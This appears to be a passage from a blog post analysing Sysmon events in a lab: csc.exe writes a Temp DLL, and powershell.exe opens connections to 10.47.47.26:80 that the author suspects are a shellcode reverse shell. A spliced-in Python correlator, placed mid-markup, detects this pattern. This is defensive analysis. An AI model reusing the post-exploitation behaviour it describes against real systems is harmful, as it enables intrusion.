class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span 
class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">File created:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: DLL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:37.458</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 44</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetFilename: 
C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CreationUtcTime: 2020-07-19 20:03:37.161</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Next up, Sysmon shows:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: 
normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:39 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>3</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Network connection detected (rule: NetworkConnect)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; 
margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Network connection detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: 
monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:34.735</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;">Protocol: tcp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Initiated: true</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIp: 10.47.47.17</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceHostname: wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePort: 53245</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; 
margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePortName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationIp: 10.47.47.26</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationHostname: -</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPort: 80</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPortName: http</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 
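<![CDATA[
"></div>
<div>The events so far can be tied together by the process GUIDs Sysmon stamps on every record: the file create carries the ProcessGuid of csc.exe (PID 44), the cvtres.exe process create carries that same GUID as its ParentProcessGuid, and the network connection carries the GUID of the powershell.exe process. The Python correlator below is an added example and is not code from the original post. It runs over constructed records laid out like the listings above; the GUIDs, images and paths for csc.exe, the Temp DLL and the powershell.exe connection mirror the events shown, while the csc.exe ProcessCreate record (with powershell.exe as its parent) and the cvtres.exe ProcessGuid are assumed values, since those fields do not appear in the events reproduced here.</div>

```python
import re

# Constructed Sysmon records in the "Key: value" layout of the listings above.
# The csc.exe ProcessCreate record and the cvtres.exe ProcessGuid are assumed
# (placeholder) values; the other GUIDs, images and paths mirror the post.
SAMPLE_EVENTS = r"""
Event ID: 1
ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}
Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
ParentProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}
ParentImage: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
---
Event ID: 1
ProcessGuid: {00000000-0000-0000-0000-00000000cafe}
Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
ParentProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}
ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
---
Event ID: 11
ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}
Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
TargetFilename: C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.dll
---
Event ID: 3
ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}
Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
Initiated: true
DestinationIp: 10.47.47.26
DestinationPort: 80
"""

COMPILERS = {"csc.exe", "cvtres.exe"}
TEMP_DLL = re.compile(r"\\AppData\\Local\\Temp\\.*\.dll$", re.IGNORECASE)


def parse_events(text):
    """Split a 'Key: value' listing into one dict per event; events are separated by ---."""
    events = []
    for block in text.strip().split("---"):
        rec = {}
        for line in block.strip().splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            events.append(rec)
    return events


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(guid, procs):
    """Return [(guid, image)] for a process and its ancestors, newest first.
    ParentImage fills in the top-most parent when its own ProcessCreate event is absent."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        rec = procs[guid]
        chain.append((guid, basename(rec["Image"])))
        parent = rec.get("ParentProcessGuid")
        if parent and parent not in procs:
            chain.append((parent, basename(rec.get("ParentImage", ""))))
        guid = parent
    return chain


def correlate(events):
    """Tie compiler spawn, Temp DLL write and outbound connection together by ProcessGuid."""
    procs = {e["ProcessGuid"]: e for e in events if e["Event ID"] == "1"}
    findings, ps_guids = [], set()
    # Rule 1: a C# compiler toolchain process whose ancestry includes powershell.exe.
    for guid in procs:
        chain = lineage(guid, procs)
        if chain[0][1] in COMPILERS:
            for parent_guid, image in chain[1:]:
                if image == "powershell.exe":
                    ps_guids.add(parent_guid)
                    findings.append({"rule": "powershell_runtime_compile",
                                     "guid": guid, "image": chain[0][1],
                                     "powershell": parent_guid})
                    break
    # Rule 2: the compiler writes a DLL under the user's Temp directory.
    for e in events:
        if (e["Event ID"] == "11" and basename(e["Image"]) in COMPILERS
                and TEMP_DLL.search(e["TargetFilename"])):
            findings.append({"rule": "temp_dll_from_compiler",
                             "guid": e["ProcessGuid"], "file": e["TargetFilename"]})
    # Rule 3: the same powershell.exe that spawned the compiler opens an outbound connection.
    for e in events:
        if (e["Event ID"] == "3" and e["ProcessGuid"] in ps_guids
                and e.get("Initiated") == "true"):
            findings.append({"rule": "powershell_outbound_after_compile",
                             "guid": e["ProcessGuid"],
                             "dest": e["DestinationIp"] + ":" + e["DestinationPort"]})
    return findings


if __name__ == "__main__":
    for finding in correlate(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

<div>Keying on ProcessGuid rather than ProcessId matters because PIDs are reused, and the GUID is what lets the file create (logged as csc.exe, PID 44) and the cvtres.exe child be pinned to one compiler instance. Keying on logging order would also mislead here: the network connection's UtcTime (20:03:34) is earlier than the DLL write (20:03:37) even though its Date column shows it being recorded later, so the GUID link, not the order of the events in the log, is what joins the connection to the compile.</div>
<div style="
]]>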
400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Perhaps our shellcode set up this reverse shell connecting to 10.47.47.26 via port 80?</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And another, but the source port has incremented:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: 
normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:39 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>3</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Network connection detected (rule: NetworkConnect)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;">Network connection detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">UtcTime: 2020-07-19 20:03:35.259</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">ProcessId: 2752</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User: 1011LABS\dave.hull</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Protocol: tcp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Initiated: true</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIp: 10.47.47.17</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceHostname: wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourcePort: 53246</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePortName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIp: 10.47.47.26</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationHostname: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationPort: 80</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; 
font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationPortName: http</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Then 